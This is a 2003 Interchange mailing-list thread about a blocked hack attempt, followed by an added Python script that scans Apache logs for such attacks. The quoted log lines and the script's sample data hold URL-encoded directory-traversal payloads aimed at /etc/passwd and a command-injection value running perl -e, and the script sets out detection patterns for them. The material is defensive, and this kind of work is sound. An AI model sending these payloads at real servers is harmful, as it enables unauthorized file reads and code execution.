[ic] Hack attempt on IC 4.8.6
Ed LaFrance
edl at newmediaems.com
Sat Nov 15 09:18:07 EST 2003
At 10:35 PM 11/14/2003 -0800, you wrote:
> From what I can tell this person was unsuccessful. My IC and Apache
> logs show multiple attempts to grab my passwd file by inserting many
> ../../../../../'s in the URLs and attempts to execute arbitrary perl code
> by manipulating URL parameters. Here are a few lines:
>
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=foo%3bfoo%7cperl%20%2de%20%27print%22roo%22%3bprint%22t%3a%22%27%26%26foo%00 HTTP/1.0" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id= HTTP/1.0" 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/index.html?id= HTTP/1.0" 200 8162 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_session_id=6MZFj58R&mv_pc=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&spg=customerservice HTTP/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_session_id=6MZFj58R&mv_pc=1&spg=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_session_id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&mv_pc=1&spg=customerservice HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>
>Sorry for the weird wrapping. The log goes on and on like this.
>
>Has anyone else seen this kind of attempt? It looks like a script judging
>by the rapidity of the accesses.
>
>Ryan

I just grep'd the logs on a couple of servers for matching substrings and
came up empty. I get the impression that this attempt was targeted
specifically at Interchange. There was a vulnerability in the 4.8 branch
which could allow arbitrary file reads with a technique like this, but it
was fixed, so if you are running 4.8.7 or higher you should be OK. If you
are running an earlier version, I strongly recommend an upgrade.
- Ed
===============================================================
New Media E.M.S. Technology Solutions for Business
11630 Fair Oaks Blvd., #250 eCommerce | Consulting | Hosting
Fair Oaks, CA 95628 edl at newmediaems.com
(916) 961-0446 http://www.newmediaems.com
(866) 519-4680 Toll-Free (916) 961-0447 Fax
===============================================================
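As an added illustration, not part of Ryan's or Ed's mail and not Interchange code, the following Python script runs the kind of checks an analyst would apply to access-log lines like the ones quoted above: it parses the Apache combined format, percent-decodes each query parameter, and flags directory-traversal runs, references to /etc/passwd, embedded null bytes (the %00 that truncates whatever the application appends) and shell metacharacters or an inline perl -e. The sample lines are re-typed from the excerpt in this thread, with the traversal payload rebuilt by string repetition rather than copied character for character; the repeated decoding in decode_fully goes beyond the single-encoded requests shown here so that double-encoded variants are caught as well.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Apache "combined" log format: the request line is the first quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators are matched against the fully percent-decoded parameter value.
CHECKS = [
    ("traversal", re.compile(r"(?:\.\./){3,}")),            # a run of ../ climbing out of the docroot
    ("sensitive_file", re.compile(r"/etc/passwd")),
    ("null_byte", re.compile("\x00")),                       # %00 used to cut off an appended suffix
    ("cmd_injection", re.compile(r"[;|`]|&&|\bperl\s+-e\b")),  # shell separators or an inline interpreter
]


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing (bounded), so %252e.. is seen as ../ too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return (ip, status, param, indicator) tuples for one access-log line; [] if clean or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    # parse_qsl splits on the literal '&' before decoding, so an encoded %26 stays inside the value.
    for param, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)
        for name, pattern in CHECKS:
            if pattern.search(value):
                findings.append((m.group("ip"), m.group("status"), param, name))
    return findings


def scan_log(lines):
    """Run scan_line over an iterable of log lines and collect every finding."""
    out = []
    for line in lines:
        out.extend(scan_line(line.rstrip("\n")))
    return out


# Constructed sample: the requests from the thread, re-joined onto single lines.
TRAVERSAL = "%2e%2e%2f" * 20 + "etc%2fpasswd%00"
SAMPLE_LOG = [
    # Traversal through the id parameter; Apache answered 403.
    '66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=' + TRAVERSAL
    + ' HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"',
    # A perl one-liner chained into the id parameter; also 403.
    '66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id=foo%3bfoo%7cperl'
    '%20%2de%20%27print%22roo%22%3bprint%22t%3a%22%27%26%26foo%00 HTTP/1.0" 403 82 "-" '
    '"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"',
    # The same traversal in Interchange's mv_pc parameter; answered with a 302 redirect.
    '66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/customerservice?mv_session_id=6MZFj58R'
    '&mv_pc=' + TRAVERSAL + '&spg=customerservice HTTP/1.0" 302 39 "-" '
    '"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"',
    # The empty id= request that was served normally, for contrast.
    '66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/index.html?id= HTTP/1.0" 200 8162 "-" '
    '"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"',
]

if __name__ == "__main__":
    for ip, status, param, indicator in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} param={param} indicator={indicator}")
```

Reading the status column alongside the indicator is what tells you whether an attempt got anywhere: in the sample every flagged request ended in a 403 or a 302, and only the harmless empty id= requests were served with 200, which matches Ryan's reading that the attempt failed. To use it on a real log, replace SAMPLE_LOG with the lines of the file and feed them to scan_log.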